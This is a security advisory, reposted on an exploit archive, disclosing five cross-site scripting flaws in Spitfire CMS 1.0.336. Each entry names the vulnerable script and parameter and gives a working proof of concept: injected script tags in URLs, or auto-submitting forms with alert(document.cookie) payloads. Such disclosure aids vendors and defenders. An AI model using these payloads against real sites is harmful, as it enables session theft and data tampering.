exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Spitfire 1.0.336 Cross Site Scripting

Spitfire 1.0.336 Cross Site Scripting
Posted Jul 23, 2010
Authored by High-Tech Bridge SA | Site htbridge.com

Spitfire versions 1.0.336 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | b80f7fc2c2eb64e04275356f27046d6ace56c03015931299f289649f0b84f0a1

Spitfire 1.0.336 Cross Site Scripting

Change Mirror Download
============================================================
Vulnerability ID: HTB22482
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/site/cont_index.php" script to properly sanitize user-supplied input in "cms_id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/site/cont_index.php?cms_id=PAGE_ID"><script>alert(document.cookie)</script>

============================================================
Vulnerability ID: HTB22483
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_search.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/site/cont_index.php" script to properly sanitize user-supplied input in "search" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/site/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>

============================================================
Vulnerability ID: HTB22484
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_1.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
"tpl_element_settings_action.php" script to properly sanitize user-supplied input in "value[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/cms//edit/tpl_element_settings_action.php" method="post" name="main" >
<input type="hidden" name="action" value="save" />
<input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' />
</form>
<script>
document.main.submit();
</script>


============================================================
Vulnerability ID: HTB22485
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_2.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "tpl_backup_action.php" script to properly sanitize user-supplied input in "text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/cms/edit/tpl_backup_action.php" method="post" name="main" >
<input type="hidden" name="action" value="message" />
<input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' />
</form>
<script>
document.main.submit();
</script>



============================================================
Vulnerability ID: HTB22486
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_3.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ )
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "tpl_edit_action.php" script to properly sanitize user-supplied input in "value[headline]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
First code:

<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >
<input type="hidden" name="action" value="save" />
<input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' />
<input type="hidden" name="winid" value="0" />
</form>
<script>
document.main.submit();
</script>

Second code:

<form action="http://host/cms//edit/tpl_edit_action.php" method="post" name="main" >
<input type="hidden" name="action" value="value" />
<input type="hidden" name="tabid" value="headline" />
<input type="hidden" name="winid" value="0" />
</form>
<script>
document.main.submit();
</script>


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close